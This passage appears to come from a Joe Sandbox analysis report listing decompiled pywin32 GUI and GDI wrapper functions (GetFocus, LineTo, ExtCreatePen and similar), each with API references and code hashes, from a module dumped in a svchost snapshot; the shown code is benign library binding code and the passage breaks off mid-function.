                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@InfoObject_ParseRestoreSaveScrollTupleWin_
                            • String ID: GetScrollInfo$Oi|i:GetScrollInfo
                            • API String ID: 576370750-4287172120
                            • Opcode ID: 7a109d1832258297cbcf8a3970399e840b3a734925603a46f82f0ec17055fcdd
                            • Instruction ID: d85da7861c7a3bdbd25a3a0fb0b85db62d3cf4b4d41196361a70ca01ae936b71
                            • Opcode Fuzzy Hash: 7a109d1832258297cbcf8a3970399e840b3a734925603a46f82f0ec17055fcdd
                            • Instruction Fuzzy Hash: 4A1173B540C305AFD700DF65CC44A6BBBF8FF55211F084A29F985C2121E771C65A8BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oiii:SetDlgItemInt,?,?,?,?), ref: 6DAADD77
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAADD93
                            • PyEval_SaveThread.PYTHON38 ref: 6DAADDA2
                            • SetDlgItemInt.USER32(?,?,?,?), ref: 6DAADDBA
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAADDC3
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetDlgItemInt,00000000), ref: 6DAADDD9
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@ItemObject_ParseRestoreSaveTupleWin_
                            • String ID: Oiii:SetDlgItemInt$SetDlgItemInt
                            • API String ID: 2484478725-3215803418
                            • Opcode ID: 9aabeac73a0956d51acab296210a36fb8a2aad04dd851b989c4711d92b215a8a
                            • Instruction ID: bed6a8a155596bfcb5424432aca9b6ad240c6e483b6f5fe5ff8ee5750f4d034b
                            • Opcode Fuzzy Hash: 9aabeac73a0956d51acab296210a36fb8a2aad04dd851b989c4711d92b215a8a
                            • Instruction Fuzzy Hash: 28118E76408201AFCB019F54CD45A6B77F8FF85601F488A69FC85D2121E731D92ADBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO:IsChild,?), ref: 6DAB79A5
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB79C6
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB79D8
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: OO:IsChild
                            • API String ID: 1248562531-3764942029
                            • Opcode ID: 707fc554cfb7a72995c569f4179718f0b1f82727931c965c73854d1924ae4895
                            • Instruction ID: bb0242a4cd422d316bbda81f9530249491efbc21c3ca54b078d130b6932153f1
                            • Opcode Fuzzy Hash: 707fc554cfb7a72995c569f4179718f0b1f82727931c965c73854d1924ae4895
                            • Instruction Fuzzy Hash: D0016135808311AFEB009B28CC45AAB7BFDFF84205F848969F898C1121F371D95A9A92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO:ReleaseDC,?), ref: 6DAB7CB5
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB7CD6
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB7CE8
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: OO:ReleaseDC
                            • API String ID: 1248562531-1002941454
                            • Opcode ID: e33bbc9cf6c491e1859885b51357e795e5ffbd4160befbcf389d4522a93d06e6
                            • Instruction ID: 7ddec5b972ca0e74d308078cafda71199342b835aaffae2bd72a5adb3d2a5346
                            • Opcode Fuzzy Hash: e33bbc9cf6c491e1859885b51357e795e5ffbd4160befbcf389d4522a93d06e6
                            • Instruction Fuzzy Hash: 5D018075808311AFEB00AB29CC45ABB7BFDFF85205F848969FC94C1121F331895A9A92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oii:LineTo,?,?,?), ref: 6DAB3DC2
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB3DDE
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB3DED
                            • LineTo.GDI32(?,?,?), ref: 6DAB3E01
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB3E0A
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(LineTo,00000000), ref: 6DAB3E20
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@LineObject_ParseRestoreSaveTupleWin_
                            • String ID: LineTo$Oii:LineTo
                            • API String ID: 93188945-3242789199
                            • Opcode ID: bd7dbbbfdbf721570ce1e23737fb6865e168345daf93f629b08107871b08abe9
                            • Instruction ID: 0aa4b89ea9a7b92388c1ffeb4a8539109c1a3b542ed30ef2674caa4f0540083a
                            • Opcode Fuzzy Hash: bd7dbbbfdbf721570ce1e23737fb6865e168345daf93f629b08107871b08abe9
                            • Instruction Fuzzy Hash: B501C076408301AFDB016B14CC44B6B7BF8FF85211F488929F999C1131E731892A8BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:CloseWindow), ref: 6DAB1DB7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB1DD3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB1DE2
                            • CloseWindow.USER32 ref: 6DAB1DEE
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB1DF7
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(CloseWindow,00000000), ref: 6DAB1E0D
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_CloseError@@Object_ParseRestoreSaveTupleWin_Window
                            • String ID: CloseWindow$O:CloseWindow
                            • API String ID: 1389620691-1835457876
                            • Opcode ID: ff9dc2bc98dfd9b11f0bef98e50506812dc7e51826b775ac4b158bef4affa3ef
                            • Instruction ID: ca9e1b67d4b2c393bed1b9cc46e7144072eba42445879782d6ec64f823bd41b9
                            • Opcode Fuzzy Hash: ff9dc2bc98dfd9b11f0bef98e50506812dc7e51826b775ac4b158bef4affa3ef
                            • Instruction Fuzzy Hash: B9016275808201AFCF016F65EC4973A7BB8FF41752F484934FC45C2122E735992BDAA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:UpdateWindow), ref: 6DAB09A7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB09C3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB09D2
                            • UpdateWindow.USER32(?), ref: 6DAB09DE
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB09E7
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(UpdateWindow,00000000), ref: 6DAB09FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@Object_ParseRestoreSaveTupleUpdateWin_Window
                            • String ID: O:UpdateWindow$UpdateWindow
                            • API String ID: 1428509002-2149152021
                            • Opcode ID: 3195e5884d260e154d6287468713615f4e3b2b39a05c66b108e5130cf006bee5
                            • Instruction ID: 11e3c1ed1c1d33bbc2429842b4342c5412c90b1ade5efa7240e455791566fc4b
                            • Opcode Fuzzy Hash: 3195e5884d260e154d6287468713615f4e3b2b39a05c66b108e5130cf006bee5
                            • Instruction Fuzzy Hash: 010162758082019FDF016B65DD4972A77B8FF91712F484934FC45C1221E735892BDAA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:FlattenPath), ref: 6DAB69F7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB6A13
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB6A22
                            • FlattenPath.GDI32(?), ref: 6DAB6A2E
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB6A37
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(FlattenPath,00000000), ref: 6DAB6A4D
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@FlattenObject_ParsePathRestoreSaveTupleWin_
                            • String ID: FlattenPath$O:FlattenPath
                            • API String ID: 1595511286-2618610921
                            • Opcode ID: d7ed0778aadf5cd925349f13e35e23fbf62a9306de158a52ccda828004bb682c
                            • Instruction ID: db80eb57c291aab972d4f61fca7b379ccc5aea1834081fdc401ac3439cd6ca88
                            • Opcode Fuzzy Hash: d7ed0778aadf5cd925349f13e35e23fbf62a9306de158a52ccda828004bb682c
                            • Instruction Fuzzy Hash: 2701D6758082009FCF006F65EC4972A7BB8FF41712F488938FD45C1222E335892BCAA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:DestroyMenu), ref: 6DAAE557
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAE573
                            • PyEval_SaveThread.PYTHON38 ref: 6DAAE582
                            • DestroyMenu.USER32(?), ref: 6DAAE58E
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAAE597
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(DestroyMenu,00000000), ref: 6DAAE5AD
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_DestroyError@@MenuObject_ParseRestoreSaveTupleWin_
                            • String ID: DestroyMenu$O:DestroyMenu
                            • API String ID: 809177625-260514386
                            • Opcode ID: 4aa49be5d3af214656bcc98da05339e341d23f09139b13691bedc0de066f8038
                            • Instruction ID: 37517a98f5981956541304a82ef255af181c285560a46840bb24c45a01096e01
                            • Opcode Fuzzy Hash: 4aa49be5d3af214656bcc98da05339e341d23f09139b13691bedc0de066f8038
                            • Instruction Fuzzy Hash: 0B0162759082019FCF006B65AC49B2A7BB4FF81606F488634FC45C2221F7359A2BDAA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:CloseFigure), ref: 6DAB6967
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB6983
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB6992
                            • CloseFigure.GDI32(?), ref: 6DAB699E
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB69A7
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(CloseFigure,00000000), ref: 6DAB69BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_CloseError@@FigureObject_ParseRestoreSaveTupleWin_
                            • String ID: CloseFigure$O:CloseFigure
                            • API String ID: 692702369-654909274
                            • Opcode ID: 28b396b4de6e9e96b5b47bd6b7e9d78e631fa99bd6ec793c04c1cccdb6aa8287
                            • Instruction ID: 72a932a12c4e4be0d25e810ba1811550b4262b552a951b746f911ceb72b34c18
                            • Opcode Fuzzy Hash: 28b396b4de6e9e96b5b47bd6b7e9d78e631fa99bd6ec793c04c1cccdb6aa8287
                            • Instruction Fuzzy Hash: 0D01A275808200AFCF006F24AC4976A7BB8FF41716F484634FC49C1222E735892BCAE2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:HideCaret), ref: 6DAB0497
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB04B3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB04C2
                            • HideCaret.USER32(?), ref: 6DAB04CE
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB04D7
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(HideCaret,00000000), ref: 6DAB04ED
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_CaretError@@HideObject_ParseRestoreSaveTupleWin_
                            • String ID: HideCaret$O:HideCaret
                            • API String ID: 3633322568-2873150280
                            • Opcode ID: a88879b1493820a14285013cb316df9746216597aa873ecd59a64fbdd28813fa
                            • Instruction ID: 191dd518746c7660585d02ab75d6b8e3b5e106a85bd6735505e1305e0c9097ee
                            • Opcode Fuzzy Hash: a88879b1493820a14285013cb316df9746216597aa873ecd59a64fbdd28813fa
                            • Instruction Fuzzy Hash: 2E01D6758082019FCF006F75DD49B2A7BB8FF81712F488534FC85C1121E735896BCAA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:AbortPath), ref: 6DAB68D7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB68F3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB6902
                            • AbortPath.GDI32(?), ref: 6DAB690E
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB6917
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(AbortPath,00000000), ref: 6DAB692D
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$AbortArg_Error@@Object_ParsePathRestoreSaveTupleWin_
                            • String ID: AbortPath$O:AbortPath
                            • API String ID: 3893949505-1868330699
                            • Opcode ID: 473cd1aa82ab714a210d69275549bb9760735c8ae87749eeaceff191b2b16c07
                            • Instruction ID: 6981b9f5299eebd9b2c96717f9f9dfaf4e36e0cb16d2af4fcc08c4d57c733203
                            • Opcode Fuzzy Hash: 473cd1aa82ab714a210d69275549bb9760735c8ae87749eeaceff191b2b16c07
                            • Instruction Fuzzy Hash: 0A01A275908200AFCF006F64EC49B2A77B8FF41616F484534FC49C1221E735C92BDAE2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:StrokeAndFillPath), ref: 6DAB6C37
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB6C53
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB6C62
                            • StrokeAndFillPath.GDI32(?), ref: 6DAB6C6E
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB6C77
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(StrokeAndFillPath,00000000), ref: 6DAB6C8D
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@FillObject_ParsePathRestoreSaveStrokeTupleWin_
                            • String ID: O:StrokeAndFillPath$StrokeAndFillPath
                            • API String ID: 3684901415-1572758478
                            • Opcode ID: e03f50425b6daabe0cfd36ceafb72add0239d4bd0d73d9c1ea0fbc5348b5cb5e
                            • Instruction ID: 8aff9bd2cf1b1d539bd17feec4fc0df45f869b9d6d047bd22c59c8fda309d54b
                            • Opcode Fuzzy Hash: e03f50425b6daabe0cfd36ceafb72add0239d4bd0d73d9c1ea0fbc5348b5cb5e
                            • Instruction Fuzzy Hash: CB01A2758082009FCF016F65ED4972A77B8FF41212F484534FC49C1221E335892BDAA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 21%
                            			E6DAB0920(void* __eax, char* _a4, long _a8) {
                            				long _t5;
                            				void* _t7;
                            				long _t8;
                            				void* _t11;
                            				void* _t12;
                            
                            				__imp__PyArg_ParseTuple(_a8, ":GetFocus");
                            				if(__eax != 0) {
                            					__imp__PyEval_SaveThread(_t7, _t11);
                            					_t12 = __eax;
                            					SetLastError(0);
                            					_t5 = GetFocus();
                            					_t8 = _t5;
                            					__imp__PyEval_RestoreThread(_t12);
                            					if(_t8 == 0) {
                            						_t5 = GetLastError();
                            						if(_t5 != 0) {
                            							_a8 = _t5;
                            							_a4 = "GetFocus";
                            							return __imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z();
                            						}
                            					}
                            					__imp__?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z(_t8);
                            					return _t5;
                            				} else {
                            					return __eax;
                            				}
                            			}









                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,:GetFocus), ref: 6DAB0929
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB0939
                            • SetLastError.KERNEL32(00000000), ref: 6DAB0943
                            • GetFocus.USER32 ref: 6DAB0949
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB0952
                            • GetLastError.KERNEL32 ref: 6DAB095F
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorEval_LastThread$Arg_FocusParseRestoreSaveTuple
                            • String ID: :GetFocus
                            • API String ID: 2260210701-1380985715
                            • Opcode ID: cfd56d78e0d2ae56ed8a0612b9f79463174e110b7932244890854ce50568e899
                            • Instruction ID: 675e792f17a8caef6130f8362f327df53cfcda916d2c351e0d4fab6fbc58272c
                            • Opcode Fuzzy Hash: cfd56d78e0d2ae56ed8a0612b9f79463174e110b7932244890854ce50568e899
                            • Instruction Fuzzy Hash: 86F0303650D3019FDF001B26A98C75A3B78FF86652F04C639E56AC1121E7348497DB97
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • memset.VCRUNTIME140(?,00000000,000001F4), ref: 6DAAC02E
                            • PyErr_SetString.PYTHON38(6E28ED8C,NONCLIENTMETRICS must be a dict), ref: 6DAAC058
                            • PyTuple_New.PYTHON38(00000000), ref: 6DAAC069
                            Strings
                            • iiiiiO&iiO&iiO&O&O&:NONCLIENTMETRICS, xrefs: 6DAAC0E1
                            • NONCLIENTMETRICS must be a dict, xrefs: 6DAAC051
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Err_StringTuple_memset
                            • String ID: NONCLIENTMETRICS must be a dict$iiiiiO&iiO&iiO&O&O&:NONCLIENTMETRICS
                            • API String ID: 1212661818-1994947722
                            • Opcode ID: a76c4e17e8f78b710b5fb58f9777f8e85122ee58187de613cfed7a265550b094
                            • Instruction ID: 20841d42f51068a3e768eda6dd07791580d66f7d99296830d01d2ec4f3177d99
                            • Opcode Fuzzy Hash: a76c4e17e8f78b710b5fb58f9777f8e85122ee58187de613cfed7a265550b094
                            • Instruction Fuzzy Hash: F4213EB2104A45AFD711CB98CC84EF7B3FCEB45311F08462AF666C7111EB30A6998BA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_WH@Z.PYWINTYPES38(?,?,?), ref: 6DAABE11
                            • Py_BuildValue.PYTHON38(NOk,00000000), ref: 6DAABE20
                            • ?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_WH@Z.PYWINTYPES38(?,?,?), ref: 6DAABE58
                            • ?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_WH@Z.PYWINTYPES38(?,?,00000000), ref: 6DAABE62
                            • Py_BuildValue.PYTHON38(NNk,00000000), ref: 6DAABE6D
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: FromObject_U_object@@$BuildValue
                            • String ID: NNk$NOk
                            • API String ID: 838942713-2856161187
                            • Opcode ID: c42e82431c8204ee78458451f01a978930fd75e34e6d994e53ba1324c9345d92
                            • Instruction ID: df88b6936e6397ea37ef2cc4f0a30b9b6c74c91253987de4eda5a41240fbce3b
                            • Opcode Fuzzy Hash: c42e82431c8204ee78458451f01a978930fd75e34e6d994e53ba1324c9345d92
                            • Instruction Fuzzy Hash: B12101369092059FDB289F29DC98EB37779FF45301B0A8398ED4857152DB31DCA2C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 46%
                            			E6DAAD1B0(void* __ecx, intOrPtr _a8) {
                            				struct tagLOGBRUSH _v12;
                            				long _v16;
                            				long _v20;
                            				long _v24;
                            				char _v28;
                            				char _v32;
                            				DWORD* _v36;
                            				void* _v56;
                            				long* _t23;
                            				void* _t25;
                            				DWORD** _t28;
                            				void* _t31;
                            				void* _t33;
                            				struct HPEN__* _t35;
                            				DWORD** _t39;
                            				DWORD** _t40;
                            				DWORD** _t41;
                            
                            				_t33 = __ecx;
                            				_v32 = __imp___Py_NoneStruct;
                            				_v36 = 0;
                            				_t23 =  &_v16;
                            				__imp__PyArg_ParseTuple(_a8, "kkO|O:ExtCreatePen", _t23,  &_v20,  &_v28,  &_v32);
                            				_t39 =  &(( &_v36)[6]);
                            				if(_t23 != 0) {
                            					_t25 = E6DAAD0A0(_v28,  &_v12);
                            					_t40 =  &(_t39[2]);
                            					if(_t25 == 0) {
                            						goto L1;
                            					} else {
                            						_t28 =  &_v36;
